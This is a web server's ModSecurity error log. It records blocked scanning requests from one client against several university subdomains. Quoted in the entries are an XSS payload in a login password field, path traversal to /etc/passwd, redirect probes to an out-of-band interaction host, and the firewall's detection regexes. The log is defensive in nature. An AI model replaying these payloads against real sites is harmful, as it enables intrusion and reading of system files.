[Tue Aug 29 11:52:10.593308 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAm7nGIAAAAE"]
[Tue Aug 29 11:52:10.631068 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAfWOLwAAAAL"]
[Tue Aug 29 11:52:10.649049 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAni@@8AAAAU"]
[Tue Aug 29 11:52:10.677190 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnTlMMAAAAA"]
[Tue Aug 29 11:52:10.681583 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAfWOL0AAAAL"]
[Tue Aug 29 11:52:11.609172 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAoAkvMAAAAC"]
[Tue Aug 29 11:52:11.624550 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAn95@IAAAAD"]
[Tue Aug 29 11:52:11.650843 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAnkwfUAAAAY"]
[Tue Aug 29 11:52:11.655552 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAn95@MAAAAD"]
[Tue Aug 29 11:52:11.659459 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAjdQaQAAAAZ"]
[Tue Aug 29 11:52:11.664426 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAni@-MAAAAU"]
[Tue Aug 29 11:52:11.676084 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAn0GbwAAAAa"]
[Tue Aug 29 11:52:11.688606 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAni@-QAAAAU"]
[Tue Aug 29 11:52:11.694715 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAnIloQAAAAV"]
[Tue Aug 29 11:52:11.712999 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAlIBj8AAAAn"]
[Tue Aug 29 11:52:12.576259 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAlIBkIAAAAn"]
[Tue Aug 29 11:52:12.594890 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAn0GcAAAAAa"]
[Tue Aug 29 11:52:12.594903 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15fMCo-f0AAAnjjMMAAAAX"]
[Tue Aug 29 11:52:12.595014 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnoOpYAAAAf"]
[Tue Aug 29 11:52:12.604618 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAlIBkMAAAAn"]
[Tue Aug 29 11:52:12.639578 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnTlMwAAAAA"]
[Tue Aug 29 11:52:13.537507 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAoCWFMAAAAB"]
[Tue Aug 29 11:52:13.578291 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnkwf8AAAAY"]
[Tue Aug 29 11:52:13.580629 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnIlo0AAAAV"]
[Tue Aug 29 11:52:13.715666 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnTlM8AAAAA"]
[Tue Aug 29 11:52:13.727371 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAnn2BQAAAAe"]
[Tue Aug 29 11:52:13.727691 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAlIBkcAAAAn"]
[Tue Aug 29 11:52:13.734129 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnoOpwAAAAf"]
[Tue Aug 29 11:52:13.735142 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAn0GcUAAAAa"]
[Tue Aug 29 11:52:13.738821 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnIlo8AAAAV"]
[Tue Aug 29 11:52:13.770535 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAni@-wAAAAU"]
[Tue Aug 29 11:52:14.543551 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnkwgMAAAAY"]
[Tue Aug 29 11:52:14.563649 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnjjMsAAAAX"]
